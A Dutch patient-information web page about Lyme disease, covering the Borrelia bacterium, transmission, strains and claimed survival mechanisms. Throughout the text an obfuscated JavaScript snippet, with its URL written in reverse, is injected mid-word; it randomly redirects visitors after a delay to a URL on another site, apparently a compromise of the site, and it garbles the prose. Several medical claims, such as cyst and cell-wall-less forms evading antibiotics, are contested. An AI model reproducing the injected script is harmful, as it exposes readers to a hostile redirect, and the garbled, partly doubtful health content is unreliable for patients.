Informatie

Informatie over de ziekte van Lyme

Ziekte van Lyme  – de veroorzaker

De ziekte van Lyme of Lyme-Borreliose is een infectie veroorzaakt door de Borrelia bacterie. De Borrelia bacterie is een spirocheet. Spirocheten zijn spiraalvormige bacteriën die een unieke manier van bewegen hebben door middel van zweepdraden. Ze kunnen op die manier makkelijk de cellen, het weefsel, gewrichten en het zenuwstelsel binnendringen. Dit zijn plaatsen die voor het immuunsysteem moeilijk te bereiken zijn. Niet of onvoldoende behandeld, kan de ziekte chronisch worden en verschillende orgaansystemen in het lichaam aantasten.

Manieren van besmetting

De ziekte wordt meestal opgelopen door een tekenbeet en begint vaak, maar lang niet altijd met een rode huiduitslag rond de beet en griepachtige verschijnselen.

Er is aangetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toond dat Lyme overdraagbaar is van moeder op kind tijdens de zwangerschap als de moeder een actieve infectie heeft. De kans hierop zou niet zo groot zijn en het zou vooral kort na besmetting (tekenbeet) van de moeder plaatsvinden zo blijkt uit enkele wetenschappelijke publicaties. Meer onderzoek is echter nodig. Het DNA van de Borrelia bacterie is ook gevonden in moedermelk. Of dit betekent dat besmetting ook via deze weg plaats kan vinden, is nog niet goed wetenschappelijk onderzocht.

Seksuele overdracht of besmetting via bloedtransfusie kan niet worden uitgesloten. Hier is nog onvoldoende onderzoek naar gedaan. Sommige wetenschappers denken dat andere bijtende insecten, zoals muggen, vlooien, bijtende vliegen en luizen ook in staat zijn Lyme-Borreliose over te brengen. Meer onderzoek is ook hier gewenst.

De verschillende stammen

Er zijn meer dan 300 verschillende stammen van de Borrelia bacterie, waarvan er drie veel voorkomen. Elk zorgen zij voor verschillende uitingsvormen/symptoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomen:

  • Afzelii: geeft huidaandoeningen, waaronder ACA (Acrodermatitis Chronica Atrophicans). Hierbij kleurt de huid rood/paars en wordt papierdun.
  • Garnii: besmetting met de Garnii-stam geeft klachten in de hersenen en het centrale zenuwstelsel. Denk bijvoorbeeld aan: zenuwpijn, hersenmist, concentratieproblemen, woordvindingsproblemen, de-realisatie (een onwerkelijk gevoel, alsof men in een film leeft), depersonalisatie, hoofdpijn, stemmingswisselingen, tintelingen etc.
  • Burgdorferi: vernoemd naar de ontdekker van Lyme. Deze stam kan verschijnselen geven als: pijn in spieren en gewrichten of krachtverlies. Ook hartproblemen kunnen zich voordoen.

Bovenstaande symptoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomen zijn slechts een klein deel van de voorkomende symptoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomen.

Overlevingsmechanismen van de Borrelia bacterie

De Borrelia bacterie heeft veel verschillende overlevingsmechanismen. De borrelia is een spirocheet en heeft daardoor de vorm van een spiraal, maar is ook in staat om andere vormen aan te nemen en zo buiten schot blijven voor het immuunsysteem en antibiotica. Er zijn verschillende mechanismen die de spirocheet toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot zijn beschikking heeft:

  • Door haar celwand af te werpen kan de borrelia voor immuun cellen volledig onherkenbaar worden. (Celwandloze L-vorm)
  • Borrelia kan zich heel gemakkelijk inkapselen en in slapende vorm overleven en onzichtbaar blijven (Cystevorm)
  • De borrelia spirocheet kan zich door in andere cellen een gat te boren, de kern doden en er vervolgens zelf in te gaan zitten en zich zo verborgen houden voor het immuunsysteem. Borrelia kan zichzelf ook verbergen door een omhulling van het menselijk eiwit te maken.
  • De borrelia kan kleine stukjes DNA van zichzelf losmaken en deze als een soort afleidingsmanoeuvre door het lichaam laten circuleren, zodat het immuunsysteem niet meer weet waar de borrelia werkelijk zit. Door de stukjes DNA ook op menselijke cellen af te zetten gaat het immuunsysteem eigen weefsel aanvallen.  (Autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-immuunziekten)
  • De borrelia spirocheet, die verder ontwikkeld is dan alle andere spirocheten, kan door het afscheiden van bepaalde stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffen de omstandigheden binnen het lichaam van de gastheer zodanig manipuleren dat de omstandigheden voor haarzelf zo gunstig mogelijk zijn.

 

Lees verder over de $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomen/”>symptoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomen van de ziekte van Lyme.

Facebook reacties
%d bloggers liken dit: